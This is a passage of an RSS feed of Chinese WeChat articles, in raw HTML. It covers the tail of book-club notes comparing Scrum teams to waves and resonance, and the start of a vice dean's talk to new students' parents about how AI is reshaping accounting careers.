solid;border-color: rgb(217, 217, 227);"><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);">G：波粒二象性的隐喻，粒子性像个人，波动性像团队。需要观察者/自我同时进行觉察。</span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><strong>🔸 共振力量</strong>：团队共振、频率调整、量化与转型</p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><span style="outline: 0px;">W：布朗运动，分段分组波动，是瀑布的老问题，不同的职能或小组不能共同形成one team。有些小组甚至不太想和其他团队融合，希望表现出自己performance挺好的，但不愿意把整个组织不好暴露出来。在实际团队里面，可能确实有这个情况，小王国特别重，</span><span style="outline: 0px;color: rgb(250, 0, 0);">要整体共振，而不是局部最优</span><span style="outline: 0px;">。大家都有自己的立场，不和别人共振，</span><span style="outline: 0px;color: rgb(250, 0, 0);">局部最优毫无意义</span><span style="outline: 0px;">。</span></p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><span style="outline: 0px;">W：频率和共振的力量。可以解释：为什么迭代周期非要一致？</span></p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;font-family: system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-size: 11pt;"><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;">S：找到团队的一个点，产生最大的共振，带团队</span><span style="outline: 0px;font-family: Calibri;">/</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;">咨询</span><span style="outline: 0px;font-family: Calibri;">/</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;">教练很好的一个切入点。撬动团队最大的共振点。调到最大的共振幅度。</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;color: rgb(250, 0, 0);">人和人的沟通也是共振，和工程活动一样，是团队动能的总和的一部分</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;">。</span></p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;font-family: system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-size: 11pt;"><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;">W：该书结合科学、量化。有助于回答</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;color: rgb(250, 0, 0);">更深层次的问题</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;">，例如，为什么只能是</span><span style="outline: 0px;font-family: Calibri;">/</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;">最好是</span><span style="outline: 0px;font-family: Calibri;">scrum</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;">？如何检视和调整（参数），达到频率</span><span style="outline: 0px;font-family: Calibri;">/</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;">波长的平衡？我们为什么要用某种方式去快一点还是慢一点？</span></p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;">F：如何量化、度量，让各方对齐，转型时同频共振。</p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;">C：频率和波长，目标的进度，相关的类比；如果速度，凝聚力都有，不知道目标在哪里？即：每个迭代有目标，<span style="outline: 0px;color: rgb(250, 0, 0);">长远的产品路线图</span>是缺失的。那么需要关注影响地图，团队要共创路线图和蓝图。</p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><span style="outline: 0px;">W：波和共振，个体之间容易共振，真正的挑战是让不同的小规模的波进行共振，形成更大的波；谈到度量、量化，我们需要找一个更好的点去量化这个过程，找一个好的量化角度，促成聚焦，形成最大共振。需要找到度量指标方向，否则我们会被困在那里，并</span><span style="outline: 0px;color: rgb(250, 0, 0);">没有动力去改善</span><span style="outline: 0px;">。</span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><strong>🔸 挑战与共创</strong>：名校精神，挑战促进团队合作</p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><span style="outline: 0px;"><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);">L：团队如果没被逼到那个角度，非要共振才能完成一个事情，那么团队就没有压力，还会按照原来的方式去完成，每个人就没有动力去做T型人才。我们是可以给团队一个更有挑战性的目标。我陪女儿去访校，霍普金斯，提问该校大二学姐：你们学生独立作战多，还是合作的多；答曰：</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(250, 0, 0);">我们教授提出的挑战，无论如何是一个人无法完成的！</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);"> 名校更侧重促进团队合作的目标，让一个人搞不定，他就去寻求合作。</span></span></p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);">中文书：<a href="https://leanpub.com/firstprinciplesinscrum-zh-Hans" target="_blank">https://leanpub.com/firstprinciplesinscrum-zh-Hans</a></span></p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;">加入社区、读书会的wx：ScrumInc</p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><br/></p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><span style="outline: 0px;"><br/></span></p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><span style="outline: 0px;"><br/></span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);"><br/></span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><span style="color: rgb(55, 65, 81);text-align: start;white-space: pre-wrap;outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;visibility: visible;"><br/></span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><span style="color: rgb(55, 65, 81);text-align: start;white-space: pre-wrap;outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;visibility: visible;"><br/></span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><span style="color: rgb(55, 65, 81);text-align: start;white-space: pre-wrap;outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;visibility: visible;"><br/></span></p><p><strong style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);visibility: visible;"><span style="outline: 0px;font-size: 20px;visibility: visible;"><br/></span></strong></p><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483824">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=92cc7b2d&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247483824%26idx%3D1%26sn%3D92bc66aaeb5e5206ab85635f9cbcbeab%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 13 Dec 2023 01:04:00 +0800</pubDate>
    </item>
    <item>
      <title>西财会计学院副院长易阳： 数字经济时代本质上是会计时代，新生家长会笔记之二</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483803&amp;idx=1&amp;sn=b545ea3a8d798a1c4714d539108d5e39</link>
      <description>西财会计学院副院长易阳：会计是数字经济时代的基础学科，数字经济时代本质上是会计时代</description>
      <content:encoded><![CDATA[<p>
<span>新生家长</span> <span>2023-10-05 22:28</span> <span style="display: inline-block;">上海</span>
</p>

<p>西财会计学院副院长易阳：会计是数字经济时代的基础学科，数字经济时代本质上是会计时代</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=05cde028&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINy3NhiarKxwpJ5XFNEmFQMXtfbmKkOHIwkLFkRhwZj1giaFacfCMWTHkhkBrY2Eajh0O7jb0qic61VGw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><br/></p><table cellspacing="0" cellpadding="0" title="" summary=""><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;"><td width="584" valign="top" style="border-width: initial;border-style: none;border-color: initial;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><strong><span style="font-size:20.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;mso-font-kerning:0pt;">目录</span></strong><span lang="EN-US" style="font-size:20.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></td></tr><tr style="mso-yfti-irow:1;mso-yfti-lastrow:yes;"><td width="569.3333333333334" valign="top" style="border-width: initial;border-style: none;border-color: initial;padding: 2pt 3pt;word-break: break-all;"><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">- </span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><span lang="EN-US" style="font-family:&#34;微软雅黑&#34;,sans-serif;color:blue;mso-ansi-language:
  X-NONE;"><span lang="EN-US">背景</span></span><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><span lang="EN-US" style="font-family:&#34;微软雅黑&#34;,sans-serif;color:blue;mso-ansi-language:
  X-NONE;"><span lang="EN-US">讲话主题</span></span><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">- </span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><span lang="EN-US" style="font-family:&#34;微软雅黑&#34;,sans-serif;color:blue;mso-ansi-language:
  X-NONE;"><span lang="EN-US">开场</span></span><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">- </span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><span lang="EN-US" style="font-family:&#34;微软雅黑&#34;,sans-serif;color:blue;mso-ansi-language:
  X-NONE;"><span lang="EN-US">职业挑战</span></span><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><span lang="EN-US" style="font-family:&#34;微软雅黑&#34;,sans-serif;color:blue;mso-ansi-language:
  X-NONE;"><span lang="EN-US">易老师当年是学霸，讲述换专业的经历</span></span><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><span lang="EN-US" style="font-family:&#34;微软雅黑&#34;,sans-serif;color:blue;mso-ansi-language:
  X-NONE;"><span lang="EN-US">新技术有颠覆性影响</span></span><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><span lang="EN-US" style="font-family:&#34;微软雅黑&#34;,sans-serif;color:blue;mso-ansi-language:
  X-NONE;"><span lang="EN-US">基础会计，被取代成定局</span></span><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><span lang="EN-US" style="font-family:&#34;微软雅黑&#34;,sans-serif;color:blue;mso-ansi-language:
  X-NONE;"><span lang="EN-US">高级会计，采用量化分析取代人工分析</span></span><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><span lang="EN-US" style="font-family:&#34;微软雅黑&#34;,sans-serif;color:blue;mso-ansi-language:
  X-NONE;"><span lang="EN-US">会计学生体量庞大，占到</span></span><span style="font-family:
  &#34;Calibri&#34;,sans-serif;color:blue;">10%</span><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">- </span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><span lang="EN-US" style="font-family:&#34;微软雅黑&#34;,sans-serif;color:blue;mso-ansi-language:
  X-NONE;"><span lang="EN-US">未来专业如何发展？</span></span><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><span lang="EN-US" style="font-family:&#34;微软雅黑&#34;,sans-serif;color:blue;mso-ansi-language:
  X-NONE;"><span lang="EN-US">向数字经济的大势对齐</span></span><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><span lang="EN-US" style="font-family:&#34;微软雅黑&#34;,sans-serif;color:blue;mso-ansi-language:
  X-NONE;"><span lang="EN-US">数字经济和会计有什么关系</span></span><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><span lang="EN-US" style="font-family:&#34;微软雅黑&#34;,sans-serif;color:blue;mso-ansi-language:
  X-NONE;"><span lang="EN-US">数据资源和全要素数字化转型</span></span><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><span lang="EN-US" style="font-family:&#34;微软雅黑&#34;,sans-serif;color:blue;mso-ansi-language:
  X-NONE;"><span lang="EN-US">会计是数字经济时代的基础学科</span></span><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><span lang="EN-US" style="font-family:&#34;微软雅黑&#34;,sans-serif;color:blue;mso-ansi-language:
  X-NONE;"><span lang="EN-US">数字经济时代本质上是会计时代</span></span><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">- </span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><span lang="EN-US" style="font-family:&#34;微软雅黑&#34;,sans-serif;color:blue;mso-ansi-language:
  X-NONE;"><span lang="EN-US">用成绩全面火力覆盖</span></span><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"> <o:p></o:p></span></p></td></tr></tbody></table><p style=""><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:
0pt;"><o:p></o:p></span></p><p style=""><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#14324D;mso-font-kerning:18.0pt;">背景<span lang="EN-US"><o:p></o:p></span></span></strong></p><p style=""><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">2023</span><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
0pt;">年<span lang="EN-US">9</span>月<span lang="EN-US">7</span>日，西财会计学院开了一次新生家长会。这是临时笔记的第二篇，是易阳副院长谈话的笔记，这些笔记疏漏错误难免，具体内容以各位老师的发言稿为准。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
0pt;"><img class="rich_pages wxw-img" data-ratio="0.7393715341959335" data-w="541" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=679f689d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINy3NhiarKxwpJ5XFNEmFQMXteeb5QwMRRic53CibdoSjOTj38ncsKBM5sgUnUCqdfp7ogBWVtUHbrpLA%2F640%3Fwx_fmt%3Dpng"/></span></p><p style=""><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#276296;mso-font-kerning:0pt;">讲话主题<span lang="EN-US"><o:p></o:p></span></span></strong></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">主要跟家长从学科发展、专业人才培养理念上，做一些交流。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">站在家长角度，从国家发展大势分析，会计到底是做什么？学了之后有什么用？社会能够产生什么样的价值？<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">以使各位家长放心，让大家能够更好的助力，一起完成高质量人才培养的任务。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#14324D;mso-font-kerning:18.0pt;">开场<span lang="EN-US"><o:p></o:p></span></span></strong></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">在院长介绍之后，再跟大家分享，这个压力很大。马院长介绍的非常非常全面，我简单做了一个小的<span lang="EN-US">ppt</span>，给大家做一个简单的汇报。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">非常高兴在美丽的金秋九月，在西南财经大学的校园跟大家相聚，我代表西南财经大学会计学院向所有远道而来的家长朋友们致以最热烈的欢迎和最诚挚的祝贺。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">第一个层面，大家能够跟西南财经大学结缘，这绝对是一个值得祝贺的事情，这证明大家多年以来培养，终于取得了一个丰硕的成果。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">第二个层面，大家能够进入西南财经大学，同时能够进入会计学学院，这绝对是更值得庆贺的一件事情，因为刚才马院长也介绍了，无论从我们的人才培养理念，还是师资的专业保障，以及制度设计等各个方面，学科发展的专业排名，从任何一个角度上来讲，会计学院是在专业领域、学科领域、学校领域都是遥遥领先的、最强的学院之一。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#14324D;mso-font-kerning:18.0pt;">职业挑战<span lang="EN-US"><o:p></o:p></span></span></strong></p><p style=""><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#276296;mso-font-kerning:0pt;">易老师当年是学霸，讲述换专业的经历<span lang="EN-US"><o:p></o:p></span></span></strong></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">所有的家长朋友，高考志愿最头疼的问题就是如何选择大学，如何选择专业。我当年在模拟考试能够排进全省前十名，选择了一个基础性的学科，数学，挑战了这个人类智商的天花板。后来发现数学挑战人类的智商的同时，对社会难及时贡献。所以后来就在高人的指点下，选择了会计。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">我觉得这个专业真的好。我们专业人士觉得好还不够，从家长的角度来看，会计到底是做什么？学了之后有什么用？社会能够产生什么样的价值？<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#276296;mso-font-kerning:0pt;">新技术有颠覆性影响<span lang="EN-US"><o:p></o:p></span></span></strong></p><p style=""><span lang="EN-US" style="mso-no-proof:yes;"><img class="rich_pages wxw-img" data-ratio="0.5763888888888888" data-w="720" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=e718b9a3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINy3NhiarKxwpJ5XFNEmFQMXtVMKmJs7qnJ4VWD1SfQGGjhEZKeBnsGwmDsx0ibCXtYvO3WPc4vw6mxg%2F640%3Fwx_fmt%3Dpng"/></span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:
0pt;"><o:p></o:p></span></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">特别在我们这个数字经济时代，大家对于这个会计的理解，可能会充满了危机和挑战。在人工智能，大数据、云计算等新技术的加持下，一些职业的功能会被一些新技术所取代。前面马院长提到一个调查报告，说会计很可能未来会被取代。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">我内心其实也是很复杂的，我觉得我好不容易花了很大努力换了一个新的专业，然后这个专业未来如果不需要了，那我就马上面临失业。但与此同时，我们其实要认识到、或者接受，<span style="font-size: 14pt;font-family: 微软雅黑, sans-serif;color: rgb(255, 0, 0);">在人工智能大数据云计算时代，新技术加持下对各行各业提供便利的同时，对职业发展带来了颠覆性的、全方位的挑战和变化</span>。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#276296;mso-font-kerning:0pt;">基础会计，被取代成定局<span lang="EN-US"><o:p></o:p></span></span></strong></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">特别是在我们基础的会计领域，传统的基础会计审计人员的应聘银行工作可能会被拒掉。银行曾经跟我们说，西财曾是中国人民银行直属的、唯一的一所大学，我们培养的大量的人才都会进入金融机构。当然他们进入银行机构，首先要从银行柜员开始做起，但今天我们已经发现大量的银行柜员肯定被取代了。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#276296;mso-font-kerning:0pt;">高级会计，采用量化分析取代人工分析<span lang="EN-US"><o:p></o:p></span></span></strong></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">此外，即便是在金领这个层级，例如职业待遇优厚、成长非常快的投行行业，他们也在大量的机器化和量化，量化金融资产等等，越来越多采用这些方式取代原有的人工的分析。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#2E75B5;mso-font-kerning:0pt;">会计学生体量庞大，占到</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#2E75B5;mso-font-kerning:0pt;">10%<o:p></o:p></span></strong></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
